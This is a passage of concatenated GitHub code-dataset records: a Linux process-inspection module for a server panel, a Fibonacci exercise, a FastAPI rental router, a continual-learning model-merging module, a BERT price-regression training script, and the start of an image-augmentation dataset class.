getstatusoutput(s_cmd)\n return status == 0\n else:\n return False\n\n\ndef get_pids(name):\n '''get pids of a process'''\n if not name:\n return\n res = []\n if os_type in ('Linux', 'Darwin'):\n s_cmd = u\"/bin/ps auxww | grep %s | grep -v grep | awk '{print $2}'\" % name\n status, result = getstatusoutput(s_cmd)\n if status == 0 and result:\n res = ' '.join(result.split()).split(' ') # list\n return res\n\n\ndef get_cmdline(pid):\n '''parse cmdline'''\n if not pid:\n return\n if os_type == 'Linux':\n if os.path.exists('/proc/%s/cmdline' % pid):\n with open('/proc/%s/cmdline' % pid, 'r') as f:\n line = f.readline()\n return line.strip()\n else:\n return ''\n\n\ndef get_base(pid):\n '''get base info'''\n if not pid:\n return\n res = {\n 'name': '',\n 'state': '',\n 'pid': '',\n 'ppid': '',\n 'fdsize': '',\n 'vmpeak': '',\n 'vmsize': ''\n }\n if os_type == 'Linux':\n if os.path.exists('/proc/%s/status' % pid):\n f = open('/proc/%s/status' % pid, 'r')\n line = f.readline()\n while line:\n out = line.strip()\n if out.startswith('Name'):\n res['name'] = out.split()[1]\n if out.startswith('State'):\n res['state'] = out.split()[1]\n if out.startswith('Pid'):\n res['pid'] = out.split()[1]\n if out.startswith('PPid'):\n res['ppid'] = out.split()[1]\n if out.startswith('FDSize'):\n res['fdsize'] = out.split()[1]\n if out.startswith('VmPeak'):\n res['vmpeak'] = out.split()[1]\n if out.startswith('VmSize'):\n res['vmsize'] = out.split()[1]\n # print(line),\n line = f.readline()\n if res['name'] and res['state'] and res['pid'] and res['ppid'] and res['fdsize'] and res['vmpeak'] and res['vmsize']:\n break\n f.close()\n return res\n\n\ndef get_file(pid):\n '''get process file'''\n if not pid:\n return\n return {'name': 'test', 'pid': pid}\n\n\ndef get_environ(pid):\n '''parse environ'''\n if not pid:\n return\n res = ''\n if os_type == 'Linux':\n if os.path.exists('/proc/%s/environ' % pid):\n with open('/proc/%s/environ' % pid, 'r') as f:\n line = f.readline()\n res = line.strip()\n return res\n\n\ndef get_status(pid):\n '''parse status'''\n if not pid:\n return\n res = {}\n if os_type == 'Linux':\n sts = '/proc/%s/status' % pid\n # sts = '/Users/douzhenjiang/test/inpanel/test/proc_status.txt'\n 
# if os_type in ('Linux', 'Darwin'):\n if os.path.exists(sts):\n f = open(sts, 'r')\n line = f.readline()\n while line:\n out = line.strip()\n # print('aaaaaaasplit', out.split())\n tmp = out.split()\n if out.startswith('Uid') or out.startswith('Gid') or out.startswith('Vm'):\n res[tmp[0].split(':')[0].lower()] = tmp[1:]\n elif out.startswith('State'):\n res[tmp[0].split(':')[0].lower()] = [tmp[1], tmp[2][1:-1].lower()]\n else:\n res[tmp[0].split(':')[0].lower()] = tmp[1] if len(tmp) > 1 else ''\n line = f.readline()\n f.close()\n return res\n\n\ndef get_io(pid):\n '''parse io'''\n if not pid:\n return\n res = {}\n if os_type == 'Linux':\n sts = '/proc/%s/io' % pid\n # sts = '/Users/douzhenjiang/test/inpanel/test/proc_io.txt'\n # if os_type in ('Linux', 'Darwin'):\n if os.path.exists(sts):\n f = open(sts, 'r')\n line = f.readline()\n while line:\n out = line.strip()\n res[out.split()[0].split(':')[0].lower()] = out.split()[1]\n line = f.readline()\n f.close()\n return res\n\n\ndef get_memory(pid):\n '''get memory, parse statm'''\n if not pid:\n return\n res = ''\n if os_type == 'Linux':\n if os.path.exists('/proc/%s/statm' % pid):\n with open('/proc/%s/statm' % pid, 'r') as f:\n line = f.readline()\n line = line.strip()\n res = line.split()\n return res\n\n\ndef get_info(pid):\n '''parse stat'''\n if not pid:\n return\n res = {}\n if os_type == 'Linux':\n sts = '/proc/%s/stat' % pid\n # sts = '/Users/douzhenjiang/test/inpanel/test/proc_stat.txt'\n # if os_type in ('Linux', 'Darwin'):\n if os.path.exists(sts):\n f = open(sts, 'r')\n line = f.readline()\n while line:\n out = line.strip()\n res = out.split()\n line = f.readline()\n f.close()\n return res\n\n\ndef get_network(pid):\n '''parse network'''\n if not pid:\n return\n res = {}\n if os_type == 'Linux':\n sts = '/proc/%s/stat' % pid\n # sts = '/Users/douzhenjiang/test/inpanel/test/proc_stat.txt'\n # if os_type in ('Linux', 'Darwin'):\n if os.path.exists(sts):\n f = open(sts, 'r')\n line = f.readline()\n while line:\n out = line.strip()\n res = out.split()\n line = f.readline()\n f.close()\n return res\n\n\nif __name__ == '__main__':\n # pids = get_list()\n # print(pids)\n # print('kill_process', kill_process('sshd'))\n # print('kill_pid00', kill_pids(11587))\n # print(get_pids('php'))\n print(get_status(1))\n # print(get_base(2345))\n","repo_name":"vanbac91/rumpanel","sub_path":"core/modules/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":7366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"44647680050","text":"def fib(n):\n global dp\n if dp[n] == -1:\n dp[n] = fib(n - 1) + fib(n - 2)\n return dp[n]\n\n\ndef main():\n global dp\n # YOUR CODE GOES HERE\n # Please take input and print output to standard input/output (stdin/stdout)\n # E.g. 
'input()/raw_input()' for input & 'print' for output\n n = int(input())\n dp = [-1] * (n + 1)\n dp[0] = 0\n dp[1] = 1\n\n fib(n)\n\n print(dp[n])\n return dp[n]\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"0xStryK3R/Scaler-DSA-Revision","sub_path":"python/Day-69/CW_1.py","file_name":"CW_1.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"25413246549","text":"from typing import Any, Optional, List\nfrom fastapi import APIRouter, Body, Depends, HTTPException\nfrom fastapi.encoders import jsonable_encoder\nfrom pydantic.networks import EmailStr\nfrom app.core import crud, schemas, models\nfrom app.api_v1 import deps\n\n\nrouter = APIRouter()\n\n\n@router.get(\"/{user_id}\", response_model=Optional[schemas.C2CSchema])\nasync def get_rent_by_id(\n *,\n rent_id: int,\n current_user: models.User = Depends(deps.get_current_active_user)\n) -> Optional[models.C2C]:\n rent_by_id = await crud.c2c.get(id=rent_id)\n if not rent_by_id:\n raise HTTPException(\n status_code=404,\n detail=\"Not found\"\n )\n return rent_by_id\n\n# @router.get(\"/me\", response_model=Optional[schemas.UserSchema])\n# async def get_user_me(\n # current_user: models.User = Depends(deps.get_current_active_user)\n# ) -> Optional[models.User]:\n # return current_user\n\n@router.get(\"/\", response_model=List[schemas.C2CSchema])\nasync def get_rents(\n current_user: models.User = Depends(deps.get_current_active_user)\n) -> List[Optional[models.C2C]]:\n return await crud.c2c.get_multy()\n\n@router.post(\"/create\", response_model=schemas.C2CSchema)\nasync def create_rent(\n *,\n schema: schemas.C2CCreate,\n current_user: models.User = Depends(deps.get_current_active_user)\n) -> models.C2C:\n return await crud.c2c.create(schema=schema)\n\n# @router.post(\"/open/create\", response_model=schemas.UserSchema)\n# async def create_user_open(\n # *,\n # email: EmailStr = Body(...),\n # password: str = Body(...)\n# ) -> models.User:\n # user = await crud.user.get_by_email(email=email)\n # if user:\n # raise HTTPException(\n # status_code=400,\n # detail=\"The user with this email already exists in the system\"\n # )\n # schema = schemas.UserCreate(password=password, email=email)\n # return await crud.user.create(schema=schema)\n\n# @router.put(\"/update/{user_id}\", response_model=Optional[schemas.UserSchema])\n# async def update_user(\n # *,\n # user_id: int,\n # schema: schemas.UserUpdate,\n # current_user: models.User = Depends(deps.get_current_active_superuser)\n# ) -> Optional[models.User]:\n # update_user = await crud.user.update(id=user_id, schema=schema)\n # if not update_user:\n # raise HTTPException(\n # status_code=404,\n # detail=\"The user with this id does not exists in the system\"\n # )\n # return update_user\n\n# @router.put(\"/update/me\", response_model=Optional[schemas.UserSchema])\n# async def update_user_me(\n # *, \n # email: EmailStr = Body(None),\n # password: str = Body(None),\n # current_user: models.User = Depends(deps.get_current_active_user)\n# ) -> Optional[models.User]:\n # current_user_data = jsonable_encoder(current_user)\n # schema = schemas.UserUpdate(**current_user_data)\n # if password is not None:\n # schema.password = password\n # else:\n # schema.password = \"\"\n # if email is not None:\n # schema.email = email\n # else:\n # schema.email = current_user.email\n # return await crud.user.update(id=current_user.id, schema=schema)\n\n# @router.delete(\"/delete/{user_id}\", 
response_model=Optional[models.User])\n# async def delete_user(\n # *,\n # user_id: int,\n # current_user: models.User = Depends(deps.get_current_active_superuser)\n# ) -> Any:\n # del_user = await crud.user.delete(id=user_id)\n # if not del_user:\n # raise HTTPException(\n # status_code=404,\n # detail=\"The user does not exist\"\n # )\n # return del_user\n\n# @router.delete(\"/delete/me\", response_model=Optional[models.User])\n# async def delete_user_me(\n # *,\n # email: EmailStr = Body(None),\n # password: str = Body(None),\n # current_user: models.User = Depends(deps.get_current_active_user)\n# ) -> Optional[models.User]:\n # user = await crud.user.authenticate(email=email, password=password)\n # if user.id == current_user.id:\n # del_user = await crud.user.delete(id=current_user.id)\n # return del_user \n # raise HTTPException(\n # status_code=404,\n # detail=\"Incorrect email or password\"\n # )\n","repo_name":"Mememasta/inow-back","sub_path":"app/api_v1/endpoints/c2c.py","file_name":"c2c.py","file_ext":"py","file_size_in_byte":4267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"11203846163","text":"from copy import deepcopy\n\nfrom torch.nn import functional as F\nfrom torch.autograd import Variable\nimport shared_utils.methods as methods\n\nfrom shared_utils.ImageFolderTrainVal import *\nimport shared_utils.utils as utils\n\nimport train.MAS.MAS as MAS\n\n\ndef get_merge_weights(args, iw_user, head_param_names, models, last_task_idx, overwrite, cuda=True, eps=1e-10):\n \"\"\"\n Calculate merged IWs for all the trained models and save them to the same location.\n \"\"\"\n print(\"IMM PREPROCESSING: Mode {}, overwrite={}\".format(args.IMM_mode, overwrite))\n iw_matrices = []\n sum_iw_matrices = [] # All summed of previous tasks (first task not included)\n sum_iw_matrix = None\n args.iw_paths = []\n args.sum_iw_paths = []\n\n iw_name = args.method.get_iw_name(args.eval_ds.name, user=iw_user, task_agnostic=args.task_agnostic)\n sum_iw_name = args.method.get_iw_name(args.eval_ds.name, user=iw_user, sum=True, task_agnostic=args.task_agnostic)\n\n # Checks\n assert len(args.iw_ds_holder) == len(args.merge_target_models), \\\n \"Subsetting requires both IW dataset and model subsetting.\"\n\n for model_list_index in range(0, last_task_idx + 1):\n print(\"*** ESTIMATING IWS on MODEL of TASK {}\".format(model_list_index + 1))\n iw_out_file_path = os.path.join(os.path.dirname(args.merge_target_models[model_list_index]), iw_name)\n sum_iw_out_file_path = os.path.join(os.path.dirname(args.merge_target_models[model_list_index]), sum_iw_name)\n\n #######################################\n # Get individual model IW matrices\n if os.path.exists(iw_out_file_path) and not overwrite:\n model_iw_matrix = torch.load(iw_out_file_path)\n print('LOADED PRECISION MATRIX FOR TASK {} : {}'.format(model_list_index, iw_out_file_path))\n else:\n model = deepcopy(models[model_list_index])\n\n # When task-agnostic: iterate over all datasets for 1 model\n task_idxs = [model_list_index] if not args.task_agnostic else list(range(len(args.iw_ds_holder)))\n model_iw_matrix = None\n for task_idx in task_idxs:\n print(\"* IW: MODEL of TASK {}, on DS of TASK={}\".format(model_list_index + 1, task_idx + 1))\n\n # Init data\n if isinstance(args.iw_ds_holder[task_idx], str): # Load from path\n dsets = torch.load(args.iw_ds_holder[task_idx])\n else: # Imgfolders in memory\n dsets = args.iw_ds_holder[task_idx]\n dset_loaders = {\n x: 
torch.utils.data.DataLoader(dsets[x], batch_size=args.bs, shuffle=True, num_workers=8)\n for x in args.ds_subsets}\n\n # Format params\n if args.debug:\n print(\"PARAM NAMES\")\n [print(n) for n, p in model.named_parameters() if p.requires_grad]\n model.params = {n: p for n, p in model.named_parameters() if p.requires_grad}\n\n # Calculate IWS\n if isinstance(args.method, methods.IMM) and args.IMM_mode == 'mode_MAS' \\\n or isinstance(args.method, methods.LocallyAdaptive) and 'plain' in args.LA_mode:\n dset_loaders = [dset for dset in dset_loaders.values()]\n task_iw_matrix = MAS_iws(model, dset_loaders, exclude_params=head_param_names,\n normalize_mode=args.LA_mode,\n cuda=True, mode=args.method.mode)\n\n elif isinstance(args.method, methods.IMM) and args.IMM_mode == 'mode' \\\n or isinstance(args.method, methods.LocallyAdaptive) and 'FIM' in args.LA_mode:\n task_iw_matrix = diag_fisher(model, dset_loaders, exclude_params=head_param_names, cuda=True)\n else:\n raise Exception(\"NO valid method to get IWS for:{}\".format(args.method))\n\n # Checks\n assert [task_iw_matrix.keys()] == [\n {name for name, p in model.named_parameters() if name not in head_param_names}]\n if not cuda:\n task_iw_matrix = {name: p.cpu().clone() for name, p in task_iw_matrix.items()}\n\n # Sum over all task_idxs\n if model_iw_matrix is None:\n model_iw_matrix = task_iw_matrix\n else:\n model_iw_matrix = add_iws(task_iw_matrix, model_iw_matrix)\n\n # Cleanup\n del model\n dset_loaders.clear()\n torch.cuda.empty_cache()\n\n if args.store_iws:\n print(\"Saving IW matrix: \", iw_out_file_path)\n torch.save(model_iw_matrix, iw_out_file_path)\n args.iw_paths.append(iw_out_file_path)\n iw_matrices.append(model_iw_matrix)\n\n #######################################\n # Update incremental sum matrix for each model\n if sum_iw_matrix is None:\n sum_iw_matrix = model_iw_matrix\n else:\n if os.path.exists(sum_iw_out_file_path) and not overwrite:\n sum_iw_matrix = torch.load(sum_iw_out_file_path)\n print('LOADED SUM-PRECISION MATRIX FOR TASK {} : {}'.format(model_list_index, sum_iw_out_file_path))\n else:\n if args.debug:\n for name, p in sum_iw_matrix.items():\n try:\n print(\"{}: {} -> {}\".format(name, p.shape, model_iw_matrix[name].shape))\n except:\n pass\n sum_iw_matrix = add_iws(model_iw_matrix, sum_iw_matrix)\n\n # This is of key importance to avoid divison by zero\n for name, p in sum_iw_matrix.items():\n sum_iw_matrix[name][p == 0] = eps\n\n if args.store_iws:\n print(\"Saving SUM precision matrix: \", sum_iw_out_file_path)\n torch.save(sum_iw_matrix, sum_iw_out_file_path)\n args.sum_iw_paths.append(sum_iw_out_file_path)\n sum_iw_matrices.append(sum_iw_matrix)\n torch.cuda.empty_cache()\n\n return iw_matrices, sum_iw_matrices\n\n\ndef add_iws(iw_matrix, sum_iw_matrix):\n \"\"\" ADD iw_matrix to sum_iw_matrix.\"\"\"\n sum_iw_matrix = {name: p + iw_matrix[name]\n for name, p in sum_iw_matrix.items()}\n assert len([iw_matrix[name] != p for name, p in sum_iw_matrix.items()]) > 0\n\n return sum_iw_matrix\n\n\ndef merging_preprocess(args, overwrite=False, cuda=True):\n \"\"\"\n Create and save all merged models for the specified method.\n :param args.merge_target_models: list of all model paths to merge incrementally.\n :param user: user for which to calculate IWs, None means no specific user.\n :param overwrite: Overwrite if exists.\n :param cuda: Store and load all models, IWs in cuda format. 
Otherwise only IW calculation itself runs on GPU.\n :return: pathlist of merged models\n \"\"\"\n\n IMM_mode = args.method.mode\n use_iws = isinstance(args.method, methods.LocallyAdaptive) or \\\n isinstance(args.method, methods.IMM) and (IMM_mode == 'mode' or IMM_mode == 'mode_MAS')\n merged_model_paths = []\n last_task_idx = len(args.merge_target_models) - 1\n merge_model_name = args.method.get_merged_model_name(args.eval_ds.name, args.user)\n\n models = None\n\n # Keep first model (no merge needed)\n merged_model_paths.append(args.merge_target_models[0])\n\n # Create merged model for each task (except first)\n iws_initialized = False\n\n for task_list_index in range(1, last_task_idx + 1):\n out_file_path = os.path.join(os.path.dirname(args.merge_target_models[task_list_index]), merge_model_name)\n skip_merge = args.skip_merging or os.path.exists(out_file_path) and not overwrite\n\n # Init only when necessary\n if models is None:\n models = init_models(args, cuda)\n last_layer_index, _ = utils.get_last_neural_layer(models[0])\n head_param_names = ['classifier.{}.{}'.format(last_layer_index, name) for name, p in\n models[0].classifier._modules[last_layer_index].named_parameters()]\n if args.debug:\n print(\"HEAD PARAM NAMES\")\n [print(name) for name in head_param_names]\n\n # Mean IMM\n if IMM_mode == 'mean':\n if skip_merge:\n print(\"SKIPPED MERGING OF: {}\".format(out_file_path))\n else:\n merged_model = IMM_merge_models(models, task_list_index, head_param_names, cuda=cuda)\n\n # Mode IMM\n elif use_iws:\n if not iws_initialized:\n iw, sum_iw = get_merge_weights(args, args.iw_user, head_param_names, models, last_task_idx,\n overwrite, cuda=cuda)\n iws_initialized = True\n\n if skip_merge:\n print(\"SKIPPED MERGING OF: {}\".format(out_file_path))\n else:\n merged_model = IMM_merge_models(models, task_list_index, head_param_names,\n iw=iw, sum_iw=sum_iw[task_list_index - 1], cuda=cuda)\n else:\n raise ValueError(\"IMM mode is not supported: \", str(IMM_mode))\n\n merged_model_paths.append(out_file_path)\n torch.cuda.empty_cache()\n\n if not skip_merge:\n # Save merged model on same spot as best_model\n torch.save(merged_model, out_file_path)\n del merged_model\n print(\" => SAVED MERGED MODEL: \", out_file_path)\n\n try:\n del head_param_names, models[:]\n del iw[:], sum_iw[:]\n except:\n pass\n\n print(\"MERGED MODELS:\")\n print('\\n'.join(map(str, merged_model_paths)))\n\n return merged_model_paths\n\n\ndef init_models(args, cuda):\n models = []\n for model_path in args.merge_target_models:\n if isinstance(model_path, str):\n model = torch.load(model_path, map_location=lambda storage, loc: storage) # Load all on cpu\n else:\n model = model_path\n if cuda:\n model = model.cuda()\n else:\n model = model.cpu()\n try:\n del model.reg_params\n print(\"removed reg_params from loaded model\")\n except:\n pass\n\n models.append(model)\n torch.cuda.empty_cache()\n\n print(\"MODELS TO MERGE:\")\n print('\\n'.join(args.merge_target_models))\n print(\"LOADED \", len(models), \" MODELS in MEMORY\")\n return models\n\n\ndef diag_fisher(model, dataset, exclude_params=None, cuda=True):\n \"\"\" FIM-IMM IWs as in EWC.\"\"\"\n print(\"Calculating precision matrix\")\n if cuda:\n model = model.cuda()\n\n # initialize space for precision_matrix\n precision = {}\n for n, p in deepcopy(model.params).items():\n if n in exclude_params:\n # print(\"Skipping diag calculation for param \", n)\n continue\n p.data.zero_()\n precision[n] = Variable(p.data + 1e-8)\n\n # fill matrix\n model.eval()\n for phase in 
dataset.keys():\n        for input in dataset[phase]:\n            model.zero_grad()\n            x, label = input\n            x, label = Variable(x), Variable(label, requires_grad=False)\n\n            if cuda:\n                x = x.cuda()\n                label = label.cuda()\n            output = model(x)  # .view(1, -1)\n            temp = F.softmax(output, dim=1).data\n\n            targets = torch.reshape(Variable(torch.multinomial(temp, 1).clone()), (-1,))\n\n            if cuda:\n                targets = targets.cuda()\n\n            # label = output.max(1)[1].view(-1)\n            loss = F.nll_loss(F.log_softmax(output, dim=1), targets, size_average=True)\n\n            loss.backward()\n\n            for n, p in model.named_parameters():\n                if n in exclude_params:\n                    continue\n                precision[n].data += p.grad.data ** 2 / len(dataset[phase])\n\n    precision_param = {n: p for n, p in precision.items()}\n    return precision_param\n\n\ndef MAS_iws(model, dset_loaders, norm='L2', exclude_params=None, normalize_mode=None, cuda=True, mode=None):\n    \"\"\"MAS.\"\"\"\n    print(\"Calculating MAS IWs.\")\n    model = MAS.get_new_iws(None, None, model, None, dset_loaders=dset_loaders, norm=norm, cuda=cuda,\n                            mode=mode).cpu()\n    iws = {name: model.reg_params[param]['omega'].clone() for name, param in model.named_parameters()\n           if param in model.reg_params and name not in exclude_params}\n    del model\n    torch.cuda.empty_cache()\n\n    if normalize_mode == 'layernorm':\n        iws = {name: iw / torch.max(iw) for name, iw in iws.items()}\n        print(\"LAYERWISE NORMALIZATION\")\n    elif normalize_mode == 'modelnorm':\n        max_iws = [torch.max(val) for val in iws.values()]\n        max_iw = max(max_iws)\n        print(\"MAX IW = {}\".format(max_iw))\n        iws = {name: iw / max_iw for name, iw in iws.items()}\n        print(\"MODELWISE NORMALIZATION\")\n    elif normalize_mode == 'stdlayernorm':\n        iws = {name: iw / torch.std(iw) for name, iw in iws.items()}\n        print(\"STD LAYERWISE NORMALIZATION\")\n    elif normalize_mode == 'stdmodelnorm':\n        std_iws = [torch.std(val) for val in iws.values()]\n        max_iw = max(std_iws)\n        print(\"MAX STD IW = {}\".format(max_iw))\n        iws = {name: iw / max_iw for name, iw in iws.items()}\n        print(\"STD MODELWISE NORMALIZATION\")\n\n    return iws\n\n\ndef IMM_merge_models(models, task_list_idx, head_param_names, iw=None, sum_iw=None, cuda=True):\n    \"\"\"\n    Mean-IMM, averaging all the parameters of the trained models up to the given task.\n    Mode-IMM, see paper: using precision and sum_precision\n\n    Here alphas are all equal (1/ #models). All alphas must sum to 1.\n\n    :param models: list with all models preceding and current model of param task\n    :param task_list_idx: up to and including which task the models should be merged\n    :return: new merged model (we don't want to update the models' params in place)\n    \"\"\"\n    mean_mode = iw is None and sum_iw is None\n\n    print(\"MERGE MODE=[MEAN={}, IW={}] Merging models for TASK {}\"\n          .format(mean_mode, not mean_mode, str(task_list_idx + 1)))\n    merged_model = deepcopy(models[task_list_idx])\n\n    total_task_count = task_list_idx + 1  # e.g. 
task_idx 1, means to avg over task_idx 0 and 1 => 2 tasks\n\n # Iterate params\n for param_name, param_value in merged_model.named_parameters():\n # Don't merge heads (we use separate heads)\n if param_name in head_param_names:\n print(\"NOT MERGING PARAM {}, as it is a head param name\".format(param_name))\n continue\n\n # Calculate Mean\n mean_param = torch.zeros(param_value.data.size())\n if cuda:\n mean_param = mean_param.cuda()\n for merge_task_idx in range(0, total_task_count): # Avg over all preceding + including current task\n\n # Error check\n if models[merge_task_idx].state_dict()[param_name].size() != mean_param.size():\n print(\"ERROR WHEN MERGING MODELS\")\n raise Exception(\"ERROR WHEN MERGING MODELS: PRECEDING MODEL PARAMS TASK\",\n str(merge_task_idx), \" != PARAM SIZE OF REF TASK\", str(task_list_idx))\n\n if mean_mode: # MEAN IMM\n state_dict = models[merge_task_idx].state_dict()\n param_value = state_dict[param_name]\n mean_param = mean_param + param_value\n else: # MODE IMM\n merge_weighting = iw[merge_task_idx][param_name] / sum_iw[param_name]\n d_mean_param = merge_weighting.data * models[merge_task_idx].state_dict()[param_name]\n mean_param += d_mean_param\n assert torch.all(torch.eq(torch.sum(merge_weighting.gt(1)), 0)), \\\n print(\"MERGE VALUE > 1: {}\".format(merge_weighting[torch.nonzero(merge_weighting.gt(1))]))\n assert not torch.any(torch.isnan(merge_weighting))\n\n # Task_idx is count of how many iterated\n if mean_mode:\n mean_param = mean_param / total_task_count # Cancels out in mode IMM\n # Update this avged param\n param_value.data = mean_param.clone()\n\n return merged_model\n","repo_name":"Mattdl/DUA","sub_path":"train/IMM/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":16364,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"60"} +{"seq_id":"15635363014","text":"import numpy as np\nimport pandas as pd\nimport torch\nfrom torch.utils.data import DataLoader\nfrom transformers import AutoModelForSequenceClassification\nfrom transformers import AutoTokenizer\nfrom transformers import DataCollatorWithPadding\nfrom transformers import Trainer\nfrom transformers import TrainingArguments\n\nBASE_MODEL = 'bert-base-cased'\nLEARNING_RATE = 1e-1\nMAX_LENGTH = 512 # change this\nBATCH_SIZE = 40\nEPOCHS = 20\n\ntokenizer = AutoTokenizer.from_pretrained(BASE_MODEL)\nmodel = AutoModelForSequenceClassification.from_pretrained(BASE_MODEL,\n num_labels=1)\n\nfrom sklearn.model_selection import train_test_split\n\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.metrics import r2_score\n\n\ndef compute_metrics_for_regression(eval_pred):\n logits, labels = eval_pred\n labels = labels.reshape(-1, 1)\n\n mse = mean_squared_error(labels, logits)\n mae = mean_absolute_error(labels, logits)\n r2 = r2_score(labels, logits)\n single_squared_errors = ((logits - labels).flatten()**2).tolist()\n\n # Compute accuracy\n # Based on the fact that the rounded score = true score only if |single_squared_errors| < 0.5\n accuracy = sum([1 for e in single_squared_errors if e < 0.25\n ]) / len(single_squared_errors)\n\n return {'mse': mse, 'mae': mae, 'r2': r2, 'accuracy': accuracy}\n\n\ntraining_args = TrainingArguments(\n output_dir='../models/camembert-fine-tuned-regression-2',\n learning_rate=LEARNING_RATE,\n per_device_train_batch_size=BATCH_SIZE,\n per_device_eval_batch_size=BATCH_SIZE,\n num_train_epochs=EPOCHS,\n evaluation_strategy='epoch',\n 
save_strategy='epoch',\n    save_total_limit=2,\n    metric_for_best_model='accuracy',\n    load_best_model_at_end=True,\n    weight_decay=0.01,\n)\n\n\ndef preprocess_function(data):\n    label = float(data['price'])\n    label = np.log(label)\n    input_text = data['features']\n    output = tokenizer(input_text,\n                       truncation=True,\n                       padding='max_length',\n                       max_length=256)\n    output['label'] = label\n    return output\n\n\nif __name__ == '__main__':\n    y_train_raw = pd.read_csv('data/tabular/y_train_OXxrJt1.csv')\n    full_df = pd.read_csv('data/image_captions/df.csv')\n    full_df['price'] = y_train_raw['price']\n\n    train, test = train_test_split(full_df, test_size=0.2)\n\n    train = train[:3000]\n    test = test[:300]\n    ds = {'train': train, 'validation': test}\n\n    for split in ds:\n        ds[split] = ds[split].apply(lambda row: preprocess_function(row),\n                                    axis=1)\n        ds[split].reset_index(inplace=True, drop=True)\n\n    class RegressionTrainer(Trainer):\n        \"\"\"\n        Added by Hana: custom Trainer using an MSE loss for regression.\n        \"\"\"\n        def compute_loss(self, model, inputs, return_outputs=False):\n            labels = inputs.pop('labels')\n            outputs = model(**inputs)\n            logits = outputs[0][:, 0]\n            loss = torch.nn.functional.mse_loss(logits, labels)\n            return (loss, outputs) if return_outputs else loss\n\n    trainer = RegressionTrainer(\n        model=model,\n        args=training_args,\n        train_dataset=ds['train'],\n        eval_dataset=ds['validation'],\n        compute_metrics=compute_metrics_for_regression,\n    )\n\n    trainer.train()\n    # NOTE: this part is fragile; review carefully before reuse\n    # TODO: clean up the code\n","repo_name":"Abdellah-Laassairi/real-estate-price-prediction","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3514,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"23856748052","text":"import os\nimport cv2\nimport torch\nimport matplotlib\nimport numpy as np\nimport torchvision.transforms as transforms\nfrom PIL import Image\nfrom utils.basic_utils import rand_range\n\n\nclass DatasetBase:\n    def __init__(self, config, dataset_mode, multi_view, set_views, syn_train_data_ratio=0.0):\n        self.config = config\n        self.dataset_mode = dataset_mode\n        self.multi_view = multi_view\n        self.set_views = set_views\n\n        self.xmap = np.array([[j for _ in range(640)] for j in range(480)], dtype=np.int32)\n        self.ymap = np.array([[i for i in range(640)] for _ in range(480)], dtype=np.int32)\n\n        self.trancolor = transforms.ColorJitter(brightness=0.2, contrast=0.2, saturation=0.2, hue=0.05)\n        self.norm = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n        self.syn_train_data_ratio = syn_train_data_ratio  # ratio of synthetic data in addition to real data for multi-view training\n\n        if self.dataset_mode != 'train':\n            self.add_noise = False\n            self.add_depth_noise = False\n            self.add_color_jitter = False\n\n    def real_syn_gen(self):\n        if not self.syn_train_data_ratio or self.rng.rand() > self.syn_train_data_ratio:\n            item = self.real_gen()\n        else:\n            n = len(self.syn_lst)\n            idx = self.rng.randint(0, n)\n            item = self.syn_lst[idx]\n        return item\n\n    def real_gen(self):\n        n = len(self.real_lst)\n        idx = self.rng.randint(0, n)\n        item = self.real_lst[idx]\n        return item\n\n    def gaussian_noise(self, rng, img, sigma):\n        \"\"\"\n        add Gaussian noise of given sigma to image independently for each pixel\n        :param rng: random generator\n        :param img: image as numpy array e.g. (480, 640, 3)\n        :param sigma: int e.g. 4\n        :return: image as numpy array e.g. 
(480, 640, 3)\n \"\"\"\n \"\"\"add gaussian noise of given sigma to image\"\"\"\n img = img + rng.randn(*img.shape) * sigma\n img = np.clip(img, 0, 255).astype('uint8')\n return img\n\n def linear_motion_blur(self, img, angle, length):\n \"\"\"\n :param img: image as numpy array e.g. (480, 640, 3)\n :param angle: in degree, integer e.g. 84\n :param length: integer\n :return: image as numpy array e.g. (480, 640, 3)\n \"\"\"\n rad = np.deg2rad(angle)\n dx = np.cos(rad)\n dy = np.sin(rad)\n a = int(max(list(map(abs, (dx, dy)))) * length * 2)\n if a <= 0:\n return img\n kern = np.zeros((a, a))\n cx, cy = a // 2, a // 2\n dx, dy = list(map(int, (dx * length + cx, dy * length + cy)))\n cv2.line(kern, (cx, cy), (dx, dy), 1.0)\n s = kern.sum()\n if s == 0:\n kern[cx, cy] = 1.0\n else:\n kern /= s\n return cv2.filter2D(img, -1, kern)\n\n def rgb_add_noise(self, img, name=None):\n \"\"\"\n Add different types of noise to an RGB image, e.g. additive Gaussian noise, motion blur, sharpening, etc.\n :param img:\n :param name: file_name for debugging only\n :return:\n \"\"\"\n rng = self.rng\n\n # apply HSV augmentor\n if rng.rand() <= self.config.rgb_hsv_augment:\n hsv_img = cv2.cvtColor(img, cv2.COLOR_BGR2HSV).astype(np.uint16)\n hsv_img[:, :, 1] = hsv_img[:, :, 1] * rand_range(rng, 1.25, 1.45)\n hsv_img[:, :, 2] = hsv_img[:, :, 2] * rand_range(rng, 1.15, 1.35)\n hsv_img[:, :, 1] = np.clip(hsv_img[:, :, 1], 0, 255)\n hsv_img[:, :, 2] = np.clip(hsv_img[:, :, 2], 0, 255)\n img = cv2.cvtColor(hsv_img.astype(np.uint8), cv2.COLOR_HSV2BGR)\n\n if rng.rand() <= self.config.rgb_sharpen_ratio: # sharpen\n kernel = -np.ones((3, 3))\n kernel[1, 1] = rng.rand() * 3 + 9\n kernel /= kernel.sum()\n img = cv2.filter2D(img, -1, kernel)\n\n if rng.rand() <= self.config.rgb_motion_blur_ratio: # motion blur\n r_angle = int(rng.rand() * 360)\n r_len = int(rng.rand() * 15) + 1\n img = self.linear_motion_blur(img, r_angle, r_len)\n\n if rng.rand() <= self.config.rgb_gaussian_blur_ratio:\n if rng.rand() <= 